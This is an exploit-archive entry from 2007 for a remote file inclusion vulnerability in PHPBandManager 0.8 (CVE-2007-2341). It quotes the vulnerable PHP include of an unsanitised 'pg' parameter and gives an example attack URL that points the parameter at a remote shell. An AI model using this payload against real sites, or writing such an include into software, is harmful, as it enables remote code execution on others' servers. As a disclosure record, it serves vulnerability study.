PHPBandManager 0.8 - 'index.php?pg' Remote File Inclusion
| EKU-ID: 11767 | CVE: OSVDB-35606;CVE-2007-2341 | OSVDB-ID: |
| Author: koray | Published: 2007-04-26 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 11767 | CVE: OSVDB-35606;CVE-2007-2341 | OSVDB-ID: |
| Author: koray | Published: 2007-04-26 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
author:koray greetz:cigicigi.net script:http://sourceforge.net/projects/phpbandmanager allow_url_fopen:on or register_globals:on vuln; /bandmanager/suite/index.php include($_GET['pg'].".php"); example; http://www.victim.com/suite/index.php?pg=shell link? # milw0rm.com [2007-04-26]